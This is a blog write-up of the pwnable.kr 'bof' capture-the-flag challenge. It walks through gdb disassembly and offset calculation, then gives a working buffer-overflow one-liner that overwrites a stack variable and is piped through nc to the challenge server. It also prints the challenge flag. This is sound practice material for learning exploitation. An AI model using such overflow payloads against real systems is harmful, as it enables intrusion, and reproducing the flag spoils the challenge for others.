Friday, December 14, 2018

HOWTO : Solution of bof at Toddler's Bottle

Toddler's Bottle is one of the CTF games at pwnable.kr website. I am going to do the game is namely bof. There are already many writeups in the internet. However, I am going to explain what I learnt from this game.

Website : http://pwnable.kr/play.php (Select bof)
Source Code : http://pwnable.kr/bin/bof.c
Binary : http://pwnable.kr/bin/bof

Exploit Server : pwnable.kr:9000

The source code of the bof binary is provided. I examine the source code and found out that we are going to replace the "key" from "0xdeadbeef" to "0xcafebabe". The "overflowme" variable is 32 characters long. No matter what you entered in the "overflowme" variable, the "key" is not changed as it is hard coded. It is a buffer overflow challenge. However, we are not going to take control of the return address this time.



Load the gdb with PEDA and check with "checksec". It is confirmed that the NX is enabled with another restrictions.

gdb -q ./bof



Run "disass main" to disassemble the "main" function.

disass main



Run "disass func" to disassembe the "func" function.

disass func



In the "func" function, the following codes that I am interested in.

0x00000649 <+29>:    lea  eax,[ebp-0x2c]
0x0000064c <+32>:    mov  DWORD PTR [esp],eax
0x0000064f <+35>:    call 0x650
0x00000654 <+40>:    cmp  DWORD PTR [ebp+0x8],0xcafebabe
0x0000065b <+47>:    jne  0x66b

The "eax,[ebp-0x2c]", "ebp-0x2c" may be contained the value of "overflowme" variable and saved in eax register.

The "DWORD PTR [ebp+0x8],0xcafebabe", "ebp+0x8" may be contained the value of "key", that is "0xdeadbeef".

I am going to set a breakpoint at "0x0000065b <+47>".

b *func+47



Then "r" run the program and is prompted for entering "helloworld" as the "overflowme".



After entering the "helloworld", I am going to examine the "eax" and "ebp+0x8".

x/x $ebp+0x8
x/s $eax




The result confirmed what I suspected. I am going to check the offset the two addresses with Python. The offset is 52.



Once get the offset, I am going to overwrite the "0xdeadbeef" with "0xcafebabe" with the exploit code. The "cat" command is for the interactive with the shell.

(python -c 'print "A"*52 + "\xbe\xba\xfe\xca"'; cat -) | nc pwnable.kr 9000



The flag is :

daddy, I just pwned a buFFer :)




That's all! See you.